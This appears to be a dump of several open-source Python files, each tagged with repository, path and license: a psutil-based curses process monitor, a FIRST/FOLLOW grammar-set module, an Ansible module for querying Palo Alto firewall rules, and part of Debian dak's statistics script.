4503 giampaol 0 599M 25M 6.5 0.3 3:32.60 gnome-terminal
3868 giampaol 0 358M 8M 2.8 0.1 23:12.60 pulseaudio
3936 giampaol 0 1G 111M 2.8 1.1 33:41.67 compiz
4401 giampaol 0 536M 141M 2.8 1.4 35:42.73 skype
4047 giampaol 0 743M 76M 1.8 0.8 42:03.33 unity-panel-service
13155 giampaol 0 1G 280M 1.8 2.8 41:57.34 chrome
10 root 0 0B 0B 0.9 0.0 4:01.81 rcu_sched
339 giampaol 0 1G 113M 0.9 1.1 8:15.73 chrome
...
"""
import os
import sys
if os.name != 'posix':
sys.exit('platform not supported')
import atexit
import curses
import time
from datetime import datetime, timedelta
import psutil
# --- curses stuff
def tear_down():
win.keypad(0)
curses.nocbreak()
curses.echo()
curses.endwin()
win = curses.initscr()
atexit.register(tear_down)
curses.endwin()
lineno = 0
def print_line(line, highlight=False):
"""A thin wrapper around curses's addstr()."""
global lineno
try:
if highlight:
line += " " * (win.getmaxyx()[1] - len(line))
win.addstr(lineno, 0, line, curses.A_REVERSE)
else:
win.addstr(lineno, 0, line, 0)
except curses.error:
lineno = 0
win.refresh()
raise
else:
lineno += 1
# --- /curses stuff
def bytes2human(n):
"""
>>> bytes2human(10000)
'9K'
>>> bytes2human(100001221)
'95M'
"""
symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i + 1) * 10
for s in reversed(symbols):
if n >= prefix[s]:
value = int(float(n) / prefix[s])
return '%s%s' % (value, s)
return "%sB" % n
def poll(interval):
# sleep some time
time.sleep(interval)
procs = []
procs_status = {}
for p in psutil.process_iter():
try:
p.dict = p.as_dict(['username', 'nice', 'memory_info',
'memory_percent', 'cpu_percent',
'cpu_times', 'name', 'status'])
try:
procs_status[p.dict['status']] += 1
except KeyError:
procs_status[p.dict['status']] = 1
except psutil.NoSuchProcess:
pass
else:
procs.append(p)
# return processes sorted by CPU percent usage
processes = sorted(procs, key=lambda p: p.dict['cpu_percent'],
reverse=True)
return (processes, procs_status)
def print_header(procs_status, num_procs):
"""Print system-related info, above the process list."""
def get_dashes(perc):
dashes = "|" * int((float(perc) / 10 * 4))
empty_dashes = " " * (40 - len(dashes))
return dashes, empty_dashes
# cpu usage
percs = psutil.cpu_percent(interval=0, percpu=True)
for cpu_num, perc in enumerate(percs):
dashes, empty_dashes = get_dashes(perc)
print_line(" CPU%-2s [%s%s] %5s%%" % (cpu_num, dashes, empty_dashes,
perc))
mem = psutil.virtual_memory()
dashes, empty_dashes = get_dashes(mem.percent)
used = mem.total - mem.available
line = " Mem [%s%s] %5s%% %6s/%s" % (
dashes, empty_dashes,
mem.percent,
str(int(used / 1024 / 1024)) + "M",
str(int(mem.total / 1024 / 1024)) + "M"
)
print_line(line)
# swap usage
swap = psutil.swap_memory()
dashes, empty_dashes = get_dashes(swap.percent)
line = " Swap [%s%s] %5s%% %6s/%s" % (
dashes, empty_dashes,
swap.percent,
str(int(swap.used / 1024 / 1024)) + "M",
str(int(swap.total / 1024 / 1024)) + "M"
)
print_line(line)
# processes number and status
st = []
for x, y in procs_status.items():
if y:
st.append("%s=%s" % (x, y))
st.sort(key=lambda x: x[:3] in ('run', 'sle'), reverse=1)
print_line(" Processes: %s (%s)" % (num_procs, ' '.join(st)))
# load average, uptime
uptime = datetime.now() - datetime.fromtimestamp(psutil.boot_time())
av1, av2, av3 = os.getloadavg()
line = " Load average: %.2f %.2f %.2f Uptime: %s" \
% (av1, av2, av3, str(uptime).split('.')[0])
print_line(line)
def refresh_window(procs, procs_status):
"""Print results on screen by using curses."""
curses.endwin()
templ = "%-6s %-8s %4s %5s %5s %6s %4s %9s %2s"
win.erase()
header = templ % ("PID", "USER", "NI", "VIRT", "RES", "CPU%", "MEM%",
"TIME+", "NAME")
print_header(procs_status, len(procs))
print_line("")
print_line(header, highlight=True)
for p in procs:
# TIME+ column shows process CPU cumulative time and it
# is expressed as: "mm:ss.ms"
if p.dict['cpu_times'] is not None:
ctime = timedelta(seconds=sum(p.dict['cpu_times']))
ctime = "%s:%s.%s" % (ctime.seconds // 60 % 60,
str((ctime.seconds % 60)).zfill(2),
str(ctime.microseconds)[:2])
else:
ctime = ''
if p.dict['memory_percent'] is not None:
p.dict['memory_percent'] = round(p.dict['memory_percent'], 1)
else:
p.dict['memory_percent'] = ''
if p.dict['cpu_percent'] is None:
p.dict['cpu_percent'] = ''
if p.dict['username']:
username = p.dict['username'][:8]
else:
username = ""
line = templ % (p.pid,
username,
p.dict['nice'],
bytes2human(getattr(p.dict['memory_info'], 'vms', 0)),
bytes2human(getattr(p.dict['memory_info'], 'rss', 0)),
p.dict['cpu_percent'],
p.dict['memory_percent'],
ctime,
p.dict['name'] or '',
)
try:
print_line(line)
except curses.error:
break
win.refresh()
def main():
try:
interval = 0
while 1:
args = poll(interval)
refresh_window(*args)
interval = 1
except (KeyboardInterrupt, SystemExit):
pass
if __name__ == '__main__':
main()
| agpl-3.0 |
shaunstanislaus/Skoarcery | Skoarcery/dragonsets.py | 3 | 5398 | # ==========================================
# FIRST and FOLLOW sets from the dragon book
# ==========================================
from Skoarcery.langoids import Nonterminal, Production, Langoid
FIRST = None
FOLLOW = None
def init(compute=True):
global FIRST, FOLLOW
FIRST = DragonSet("FIRST")
FOLLOW = DragonSet("FOLLOW")
print("Dragon sets initialized.")
if compute:
compute_sets()
def compute_sets():
compute_firsts()
compute_follows()
print("Dragon sets computed")
class DragonSet:
def __init__(self, name):
self.name = name
self.D = dict()
def __call__(self, *args):
key = ""
X = args[0]
if not X:
print("EH? " + repr(args))
raise AssertionError
if isinstance(X, str):
key = X
if isinstance(X, Langoid):
key = X.name
if isinstance(X, Production):
X = X.production
if isinstance(X, list):
if self.name == "FIRST":
return FIRST_SEQ(X)
raise NotImplementedError
#print("Key: " + key + " < " + str(X) + " < " + repr(args[0]))
try:
S = self.D[key]
except KeyError:
S = set()
self.D[key] = S
return S
def __len__(self):
i = 0
for S in self.D.values():
i += len(S)
return i
def add_element(self, key, element):
#print("add-Elemetn: " + repr(key) + str(key.__class__))
try:
S = self.D[key.name]
except KeyError:
S = set()
S.add(element)
self.D[key.name] = S
def __str__(self):
s = ""
for k, v in self.D.items():
s += self.name + "(" + str(k) + "): " + str(v) + "\n"
return s
def compute_firsts():
from Skoarcery.terminals import Empty, tokens as T
from Skoarcery.nonterminals import nonterminals as N
global FIRST
# do terminals first
for X in T.values():
FIRST(X).add(X)
last = 0
first_len = len(FIRST)
while first_len > last:
last = first_len
for X in N.values():
if X.derives_empty:
FIRST(X).add(Empty)
for R in X.production_rules:
i = -1
n = len(R.production)
# figure out FIRST(X) first
for Yi in R.production:
i += 1
Yi_to_end = R.production[i:]
if len(Yi_to_end) > 0:
S = FIRST(Yi_to_end)
S.update(
everything_but_e(FIRST(Yi))
)
FIRST(X).update(S)
FIRST(Yi_to_end).update(S)
if not Yi.derives_empty:
break
# if we got to the end of the loop without breaking, add Empty
else:
FIRST(X).add(Empty)
first_len = len(FIRST)
def everything_but_e(S):
from Skoarcery.terminals import Empty
return {el for el in S if el != Empty}
#noinspection PyPep8Naming
def FIRST_SEQ(list_of_langoids):
from Skoarcery.terminals import Empty
global FIRST
OUT = set()
for Yi in list_of_langoids:
S = FIRST(Yi)
OUT.update(everything_but_e(S))
if Empty not in S:
break
# if we got to the end of the loop without breaking, add Empty
else:
OUT.add(Empty)
return OUT
#noinspection PyPep8Naming
def compute_follows():
from Skoarcery.terminals import EOF, Empty
from Skoarcery.nonterminals import nonterminals as N, SKOAR
global FIRST, FOLLOW
# start symbol gets end symbol
FOLLOW(SKOAR).add(EOF)
# repeat until nothing can be added to any follow set
last = 0
follow_len = len(FOLLOW)
while follow_len > last:
last = follow_len
for X in N.values():
for R in X.production_rules:
A = R.production
# If there is a production [ A -> alpha B beta]:
# everything except <e> in FIRST(beta) is in FOLLOW(B)
# examine each suffix (except last)
n = len(A)
for i in range(0, n - 1):
B = A[i]
if not isinstance(B, Nonterminal):
continue
beta = A[i + 1:]
#print("n: " + str(n) + " i: " + str(i) + " A: " + repr(A) + " beta: " + repr(beta))
S = FIRST(beta)
FOLLOW(B).update(everything_but_e(S))
for i in reversed(range(0, n)):
B = A[i]
if not isinstance(B, Nonterminal):
continue
# we are at the end of the list
if i == n - 1:
FOLLOW(B).update(FOLLOW(X))
continue
beta = A[i + 1:]
S = FIRST(beta)
#print(": FIRST(" + repr(beta) + ") = " + repr(S))
if Empty in S:
FOLLOW(B).update(FOLLOW(X))
else:
break
follow_len = len(FOLLOW)
| artistic-2.0 |
hryamzik/ansible | lib/ansible/modules/network/panos/panos_query_rules.py | 16 | 18383 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ansible module to manage PaloAltoNetworks Firewall
# (c) 2016, techbizdev <techbizdev@paloaltonetworks.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# limitations under the License.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_query_rules
short_description: PANOS module that allows search for security rules in PANW NGFW devices.
description: >
- Security policies allow you to enforce rules and take action, and can be as general or specific as needed. The
policy rules are compared against the incoming traffic in sequence, and because the first rule that matches the
traffic is applied, the more specific rules must precede the more general ones.
author: "Bob Hagen (@rnh556)"
version_added: "2.5"
requirements:
- pan-python can be obtained from PyPi U(https://pypi.org/project/pan-python/)
- pandevice can be obtained from PyPi U(https://pypi.org/project/pandevice/)
- xmltodict can be obtains from PyPi U(https://pypi.org/project/xmltodict/)
notes:
- Checkmode is not supported.
- Panorama is supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS firewall or Panorama management console being queried.
required: true
username:
description:
- Username credentials to use for authentication.
default: "admin"
password:
description:
- Password credentials to use for authentication.
required: true
api_key:
description:
- API key that can be used instead of I(username)/I(password) credentials.
application:
description:
- Name of the application or application group to be queried.
source_zone:
description:
- Name of the source security zone to be queried.
source_ip:
description:
- The source IP address to be queried.
source_port:
description:
- The source port to be queried.
destination_zone:
description:
- Name of the destination security zone to be queried.
destination_ip:
description:
- The destination IP address to be queried.
destination_port:
description:
- The destination port to be queried.
protocol:
description:
- The protocol used to be queried. Must be either I(tcp) or I(udp).
tag_name:
description:
- Name of the rule tag to be queried.
devicegroup:
description:
- The Panorama device group in which to conduct the query.
'''
EXAMPLES = '''
- name: search for rules with tcp/3306
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
source_zone: 'DevNet'
destination_zone: 'DevVPC'
destination_port: '3306'
protocol: 'tcp'
- name: search devicegroup for inbound rules to dmz host
panos_query_rules:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
destination_zone: 'DMZ'
destination_ip: '10.100.42.18'
address: 'DeviceGroupA'
- name: search for rules containing a specified rule tag
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
tag_name: 'ProjectX'
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
try:
import pan.xapi
from pan.xapi import PanXapiError
import pandevice
from pandevice import base
from pandevice import firewall
from pandevice import panorama
from pandevice import objects
from pandevice import policies
import ipaddress
import xmltodict
import json
HAS_LIB = True
except ImportError:
HAS_LIB = False
def get_devicegroup(device, devicegroup):
dg_list = device.refresh_devices()
for group in dg_list:
if isinstance(group, pandevice.panorama.DeviceGroup):
if group.name == devicegroup:
return group
return False
def get_rulebase(device, devicegroup):
# Build the rulebase
if isinstance(device, firewall.Firewall):
rulebase = policies.Rulebase()
device.add(rulebase)
elif isinstance(device, panorama.Panorama):
dg = panorama.DeviceGroup(devicegroup)
device.add(dg)
rulebase = policies.PreRulebase()
dg.add(rulebase)
else:
return False
policies.SecurityRule.refreshall(rulebase)
return rulebase
def get_object(device, dev_group, obj_name):
# Search global address objects
match = device.find(obj_name, objects.AddressObject)
if match:
return match
# Search global address groups
match = device.find(obj_name, objects.AddressGroup)
if match:
return match
# Search Panorama device group
if isinstance(device, pandevice.panorama.Panorama):
# Search device group address objects
match = dev_group.find(obj_name, objects.AddressObject)
if match:
return match
# Search device group address groups
match = dev_group.find(obj_name, objects.AddressGroup)
if match:
return match
return False
def addr_in_obj(addr, obj):
ip = ipaddress.ip_address(addr)
# Process address objects
if isinstance(obj, objects.AddressObject):
if obj.type == 'ip-netmask':
net = ipaddress.ip_network(obj.value)
if ip in net:
return True
if obj.type == 'ip-range':
ip_range = obj.value.split('-')
lower = ipaddress.ip_address(ip_range[0])
upper = ipaddress.ip_address(ip_range[1])
if lower < ip < upper:
return True
return False
def get_services(device, dev_group, svc_list, obj_list):
for svc in svc_list:
# Search global address objects
global_obj_match = device.find(svc, objects.ServiceObject)
if global_obj_match:
obj_list.append(global_obj_match)
# Search global address groups
global_grp_match = device.find(svc, objects.ServiceGroup)
if global_grp_match:
get_services(device, dev_group, global_grp_match.value, obj_list)
# Search Panorama device group
if isinstance(device, pandevice.panorama.Panorama):
# Search device group address objects
dg_obj_match = dev_group.find(svc, objects.ServiceObject)
if dg_obj_match:
obj_list.append(dg_obj_match)
# Search device group address groups
dg_grp_match = dev_group.find(svc, objects.ServiceGroup)
if dg_grp_match:
get_services(device, dev_group, dg_grp_match.value, obj_list)
return obj_list
def port_in_svc(orientation, port, protocol, obj):
# Process address objects
if orientation is 'source':
for x in obj.source_port.split(','):
if '-' in x:
port_range = x.split('-')
lower = int(port_range[0])
upper = int(port_range[1])
if (lower <= int(port) <= upper) and (obj.protocol == protocol):
return True
else:
if port == x and obj.protocol == protocol:
return True
elif orientation is 'destination':
for x in obj.destination_port.split(','):
if '-' in x:
port_range = x.split('-')
lower = int(port_range[0])
upper = int(port_range[1])
if (lower <= int(port) <= upper) and (obj.protocol == protocol):
return True
else:
if port == x and obj.protocol == protocol:
return True
return False
def get_tag(device, dev_group, tag_name):
# Search global address objects
match = device.find(tag_name, objects.Tag)
if match:
return match
# Search Panorama device group
if isinstance(device, panorama.Panorama):
# Search device group address objects
match = dev_group.find(tag_name, objects.Tag)
if match:
return match
return False
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(no_log=True),
username=dict(default='admin'),
api_key=dict(no_log=True),
application=dict(default=None),
source_zone=dict(default=None),
destination_zone=dict(default=None),
source_ip=dict(default=None),
destination_ip=dict(default=None),
source_port=dict(default=None),
destination_port=dict(default=None),
protocol=dict(default=None, choices=['tcp', 'udp']),
tag_name=dict(default=None),
devicegroup=dict(default=None)
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False,
required_one_of=[['api_key', 'password']]
)
if not HAS_LIB:
module.fail_json(msg='Missing required libraries.')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
api_key = module.params['api_key']
application = module.params['application']
source_zone = module.params['source_zone']
source_ip = module.params['source_ip']
source_port = module.params['source_port']
destination_zone = module.params['destination_zone']
destination_ip = module.params['destination_ip']
destination_port = module.params['destination_port']
protocol = module.params['protocol']
tag_name = module.params['tag_name']
devicegroup = module.params['devicegroup']
# Create the device with the appropriate pandevice type
device = base.PanDevice.create_from_device(ip_address, username, password, api_key=api_key)
# Grab the global objects
objects.AddressObject.refreshall(device)
objects.AddressGroup.refreshall(device)
objects.ServiceObject.refreshall(device)
objects.ServiceGroup.refreshall(device)
objects.Tag.refreshall(device)
# If Panorama, validate the devicegroup and grab the devicegroup objects
dev_group = None
if devicegroup and isinstance(device, panorama.Panorama):
dev_group = get_devicegroup(device, devicegroup)
if dev_group:
device.add(dev_group)
objects.AddressObject.refreshall(dev_group)
objects.AddressGroup.refreshall(dev_group)
objects.ServiceObject.refreshall(dev_group)
objects.ServiceGroup.refreshall(dev_group)
objects.Tag.refreshall(dev_group)
else:
module.fail_json(
failed=1,
msg='\'%s\' device group not found in Panorama. Is the name correct?' % devicegroup
)
# Build the rulebase and produce list
rulebase = get_rulebase(device, dev_group)
rulelist = rulebase.children
hitbase = policies.Rulebase()
loose_match = True
# Process each rule
for rule in rulelist:
hitlist = []
if source_zone:
source_zone_match = False
if loose_match and 'any' in rule.fromzone:
source_zone_match = True
else:
for object_string in rule.fromzone:
if object_string == source_zone:
source_zone_match = True
hitlist.append(source_zone_match)
if destination_zone:
destination_zone_match = False
if loose_match and 'any' in rule.tozone:
destination_zone_match = True
else:
for object_string in rule.tozone:
if object_string == destination_zone:
destination_zone_match = True
hitlist.append(destination_zone_match)
if source_ip:
source_ip_match = False
if loose_match and 'any' in rule.source:
source_ip_match = True
else:
for object_string in rule.source:
# Get a valid AddressObject or AddressGroup
obj = get_object(device, dev_group, object_string)
# Otherwise the object_string is not an object and should be handled differently
if obj is False:
if '-' in object_string:
obj = ipaddress.ip_address(source_ip)
source_range = object_string.split('-')
source_lower = ipaddress.ip_address(source_range[0])
source_upper = ipaddress.ip_address(source_range[1])
if source_lower <= obj <= source_upper:
source_ip_match = True
else:
if source_ip == object_string:
source_ip_match = True
if isinstance(obj, objects.AddressObject) and addr_in_obj(source_ip, obj):
source_ip_match = True
elif isinstance(obj, objects.AddressGroup) and obj.static_value:
for member_string in obj.static_value:
member = get_object(device, dev_group, member_string)
if addr_in_obj(source_ip, member):
source_ip_match = True
hitlist.append(source_ip_match)
if destination_ip:
destination_ip_match = False
if loose_match and 'any' in rule.destination:
destination_ip_match = True
else:
for object_string in rule.destination:
# Get a valid AddressObject or AddressGroup
obj = get_object(device, dev_group, object_string)
# Otherwise the object_string is not an object and should be handled differently
if obj is False:
if '-' in object_string:
obj = ipaddress.ip_address(destination_ip)
destination_range = object_string.split('-')
destination_lower = ipaddress.ip_address(destination_range[0])
destination_upper = ipaddress.ip_address(destination_range[1])
if destination_lower <= obj <= destination_upper:
destination_ip_match = True
else:
if destination_ip == object_string:
destination_ip_match = True
if isinstance(obj, objects.AddressObject) and addr_in_obj(destination_ip, obj):
destination_ip_match = True
elif isinstance(obj, objects.AddressGroup) and obj.static_value:
for member_string in obj.static_value:
member = get_object(device, dev_group, member_string)
if addr_in_obj(destination_ip, member):
destination_ip_match = True
hitlist.append(destination_ip_match)
if source_port:
source_port_match = False
orientation = 'source'
if loose_match and (rule.service[0] == 'any'):
source_port_match = True
elif rule.service[0] == 'application-default':
source_port_match = False # Fix this once apps are supported
else:
service_list = []
service_list = get_services(device, dev_group, rule.service, service_list)
for obj in service_list:
if port_in_svc(orientation, source_port, protocol, obj):
source_port_match = True
break
hitlist.append(source_port_match)
if destination_port:
destination_port_match = False
orientation = 'destination'
if loose_match and (rule.service[0] == 'any'):
destination_port_match = True
elif rule.service[0] == 'application-default':
destination_port_match = False # Fix this once apps are supported
else:
service_list = []
service_list = get_services(device, dev_group, rule.service, service_list)
for obj in service_list:
if port_in_svc(orientation, destination_port, protocol, obj):
destination_port_match = True
break
hitlist.append(destination_port_match)
if tag_name:
tag_match = False
if rule.tag:
for object_string in rule.tag:
obj = get_tag(device, dev_group, object_string)
if obj and (obj.name == tag_name):
tag_match = True
hitlist.append(tag_match)
# Add to hit rulebase
if False not in hitlist:
hitbase.add(rule)
# Dump the hit rulebase
if hitbase.children:
output_string = xmltodict.parse(hitbase.element_str())
module.exit_json(
stdout_lines=json.dumps(output_string, indent=2),
msg='%s of %s rules matched' % (hitbase.children.__len__(), rulebase.children.__len__())
)
else:
module.fail_json(msg='No matching rules found.')
if __name__ == '__main__':
main()
| gpl-3.0 |
ximion/dak-dep11 | dak/stats.py | 6 | 15923 | #!/usr/bin/env python
""" Various statistical pr0nography fun and games """
# Copyright (C) 2000, 2001, 2002, 2003, 2006 James Troup <james@nocrew.org>
# Copyright (C) 2013 Luca Falavigna <dktrkranz@debian.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
################################################################################
# <aj> can we change the standards instead?
# <neuro> standards?
# <aj> whatever we're not conforming to
# <aj> if there's no written standard, why don't we declare linux as
# the defacto standard
# <aj> go us!
# [aj's attempt to avoid ABI changes for released architecture(s)]
################################################################################
import sys
import apt_pkg
from datetime import datetime
from email.utils import mktime_tz, parsedate_tz
from mailbox import mbox
from os import listdir, system, unlink
from os.path import isfile, join, splitext
from re import findall, DOTALL, MULTILINE
from sys import stderr
from yaml import safe_load, safe_dump
from daklib import utils
from daklib.dbconn import DBConn, get_suite_architectures, Suite, Architecture
################################################################################
Cnf = None
stats = {}
users = {}
buffer = 0
FORMAT_SWITCH = '2009-08'
blacklisted = ('dak', 'katie')
NEW = ('^(\d{14})\|(?:jennifer|process-unchecked|.*?\|dak)'
'\|(Moving to new|ACCEPT-TO-NEW)')
new_ACTIONS = '^(\d{14})\|[^\|]*\|(\S+)\|NEW (\S+)[:\|]'
old_ACTIONS = ('(?:lisa|process-new)\|program start\|(.*?)\|'
'(?:lisa|process-new)\|program end')
old_ACTION = '^(\d{14})\|(?:lisa|process-new)\|(Accepting changes|rejected)\|'
################################################################################
def usage(exit_code=0):
print """Usage: dak stats MODE
Print various stats.
-h, --help show this help and exit.
The following MODEs are available:
arch-space - displays space used by each architecture
pkg-nums - displays the number of packages by suite/architecture
daily-install - displays daily install stats suitable for graphing
new - stores stats about the NEW queue
"""
sys.exit(exit_code)
################################################################################
def per_arch_space_use():
session = DBConn().session()
q = session.execute("""
SELECT a.arch_string as Architecture, sum(f.size) AS sum
FROM files f, binaries b, architecture a
WHERE a.id=b.architecture AND f.id=b.file
GROUP BY a.arch_string ORDER BY sum""").fetchall()
for j in q:
print "%-15.15s %s" % (j[0], j[1])
print
q = session.execute("SELECT sum(size) FROM files WHERE filename ~ '.(diff.gz|tar.gz|dsc)$'").fetchall()
print "%-15.15s %s" % ("Source", q[0][0])
################################################################################
def daily_install_stats():
stats = {}
f = utils.open_file("2001-11")
for line in f.readlines():
split = line.strip().split('|')
program = split[1]
if program != "katie" and program != "process-accepted":
continue
action = split[2]
if action != "installing changes" and action != "installed":
continue
date = split[0][:8]
if not stats.has_key(date):
stats[date] = {}
stats[date]["packages"] = 0
stats[date]["size"] = 0.0
if action == "installing changes":
stats[date]["packages"] += 1
elif action == "installed":
stats[date]["size"] += float(split[5])
dates = stats.keys()
dates.sort()
for date in dates:
packages = stats[date]["packages"]
size = int(stats[date]["size"] / 1024.0 / 1024.0)
print "%s %s %s" % (date, packages, size)
################################################################################
def longest(list):
longest = 0
for i in list:
l = len(i)
if l > longest:
longest = l
return longest
def output_format(suite):
output_suite = []
for word in suite.split("-"):
output_suite.append(word[0])
return "-".join(output_suite)
def number_of_packages():
arches = {}
arch_ids = {}
suites = {}
suite_ids = {}
d = {}
session = DBConn().session()
# Build up suite mapping
for i in session.query(Suite).all():
suites[i.suite_id] = i.suite_name
suite_ids[i.suite_name] = i.suite_id
# Build up architecture mapping
for i in session.query(Architecture).all():
arches[i.arch_id] = i.arch_string
arch_ids[i.arch_string] = i.arch_id
# Pre-create the dictionary
for suite_id in suites.keys():
d[suite_id] = {}
for arch_id in arches.keys():
d[suite_id][arch_id] = 0
# Get the raw data for binaries
# Simultate 'GROUP by suite, architecture' with a dictionary
# XXX: Why don't we just get the DB to do this?
for i in session.execute("""SELECT suite, architecture, COUNT(suite)
FROM bin_associations
LEFT JOIN binaries ON bin = binaries.id
GROUP BY suite, architecture""").fetchall():
d[ i[0] ][ i[1] ] = i[2]
# Get the raw data for source
arch_id = arch_ids["source"]
for i in session.execute('SELECT suite, COUNT(suite) FROM src_associations GROUP BY suite').fetchall():
(suite_id, count) = i
d[suite_id][arch_id] = d[suite_id][arch_id] + count
## Print the results
# Setup
suite_list = suites.values()
suite_id_list = []
suite_arches = {}
for suite in suite_list:
suite_id = suite_ids[suite]
suite_arches[suite_id] = {}
for arch in get_suite_architectures(suite):
suite_arches[suite_id][arch.arch_string] = ""
suite_id_list.append(suite_id)
output_list = [ output_format(i) for i in suite_list ]
longest_suite = longest(output_list)
arch_list = arches.values()
arch_list.sort()
longest_arch = longest(arch_list)
# Header
output = (" "*longest_arch) + " |"
for suite in output_list:
output = output + suite.center(longest_suite)+" |"
output = output + "\n"+(len(output)*"-")+"\n"
# per-arch data
arch_list = arches.values()
arch_list.sort()
longest_arch = longest(arch_list)
for arch in arch_list:
arch_id = arch_ids[arch]
output = output + arch.center(longest_arch)+" |"
for suite_id in suite_id_list:
if suite_arches[suite_id].has_key(arch):
count = "%d" % d[suite_id][arch_id]
else:
count = "-"
output = output + count.rjust(longest_suite)+" |"
output = output + "\n"
print output
################################################################################
def parse_new_uploads(data):
global stats
latest_timestamp = stats['timestamp']
for entry in findall(NEW, data, MULTILINE):
timestamp = entry[0]
if stats['timestamp'] >= timestamp:
continue
date = parse_timestamp(timestamp)
if date not in stats:
stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}, 'members': {}}
stats[date]['stats']['NEW'] += 1
stats['history']['stats']['NEW'] += 1
latest_timestamp = timestamp
return latest_timestamp
def parse_actions(data, logdate):
global stats
latest_timestamp = stats['timestamp']
if logdate <= FORMAT_SWITCH:
for batch in findall(old_ACTIONS, data, DOTALL):
who = batch.split()[0]
if who in blacklisted:
continue
for entry in findall(old_ACTION, batch, MULTILINE):
action = entry[1]
if action.startswith('Accepting'):
action = 'ACCEPT'
elif action.startswith('rejected'):
action = 'REJECT'
timestamp = entry[0]
if stats['timestamp'] >= timestamp:
continue
date = parse_timestamp(entry[0])
if date not in stats:
stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}, 'members': {}}
stats[date]['stats'][action] += 1
stats['history']['stats'][action] += 1
if who not in stats[date]['members']:
stats[date]['members'][who] = {'ACCEPT': 0, 'REJECT': 0,
'PROD': 0}
stats[date]['members'][who][action] += 1
if who not in stats['history']['members']:
stats['history']['members'][who] = {'ACCEPT': 0, 'REJECT': 0,
'PROD': 0}
stats['history']['members'][who][action] += 1
latest_timestamp = timestamp
parse_prod(logdate)
if logdate >= FORMAT_SWITCH:
for entry in findall(new_ACTIONS, data, MULTILINE):
action = entry[2]
timestamp = entry[0]
if stats['timestamp'] >= timestamp:
continue
date = parse_timestamp(timestamp)
if date not in stats:
stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}, 'members': {}}
member = entry[1]
if member in blacklisted:
continue
if date not in stats:
stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}, 'members': {}}
if member not in stats[date]['members']:
stats[date]['members'][member] = {'ACCEPT': 0, 'REJECT': 0,
'PROD': 0}
if member not in stats['history']['members']:
stats['history']['members'][member] = {'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}
stats[date]['stats'][action] += 1
stats[date]['members'][member][action] += 1
stats['history']['stats'][action] += 1
stats['history']['members'][member][action] += 1
latest_timestamp = timestamp
return latest_timestamp
def parse_prod(logdate):
global stats
global users
maildate = ''.join([x[-2:] for x in logdate.split('-')])
mailarchive = join(utils.get_conf()['Dir::Base'], 'mail/archive',
'mail-%s.xz' % maildate)
if not isfile(mailarchive):
return
(fd, tmpfile) = utils.temp_filename(utils.get_conf()['Dir::TempPath'])
system('xzcat %s > %s' % (mailarchive, tmpfile))
for message in mbox(tmpfile):
if (message['subject'] and
message['subject'].startswith('Comments regarding')):
try:
member = users[' '.join(message['From'].split()[:-1])]
except KeyError:
continue
ts = mktime_tz(parsedate_tz(message['date']))
timestamp = datetime.fromtimestamp(ts).strftime("%Y%m%d%H%M%S")
date = parse_timestamp(timestamp)
if date not in stats:
stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}, 'members': {}}
if member not in stats[date]['members']:
stats[date]['members'][member] = {'ACCEPT': 0, 'REJECT': 0,
'PROD': 0}
if member not in stats['history']['members']:
stats['history']['members'][member] = {'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}
stats[date]['stats']['PROD'] += 1
stats[date]['members'][member]['PROD'] += 1
stats['history']['stats']['PROD'] += 1
stats['history']['members'][member]['PROD'] += 1
unlink(tmpfile)
def parse_timestamp(timestamp):
y = int(timestamp[:4])
m = int(timestamp[4:6])
return '%d-%02d' % (y, m)
def new_stats(logdir, yaml):
global Cnf
global stats
try:
with open(yaml, 'r') as fd:
stats = safe_load(fd)
except IOError:
pass
if not stats:
stats = {'history': {'stats': {'NEW': 0, 'ACCEPT': 0,
'REJECT': 0, 'PROD': 0}, 'members': {}},
'timestamp': '19700101000000'}
latest_timestamp = stats['timestamp']
for fn in sorted(listdir(logdir)):
if fn == 'current':
continue
log = splitext(fn)[0]
if log < parse_timestamp(stats['timestamp']):
continue
logfile = join(logdir, fn)
if isfile(logfile):
if fn.endswith('.bz2'):
# This hack is required becaue python2 does not support
# multi-stream files (http://bugs.python.org/issue1625)
(fd, tmpfile) = utils.temp_filename(Cnf['Dir::TempPath'])
system('bzcat %s > %s' % (logfile, tmpfile))
with open(tmpfile, 'r') as fd:
data = fd.read()
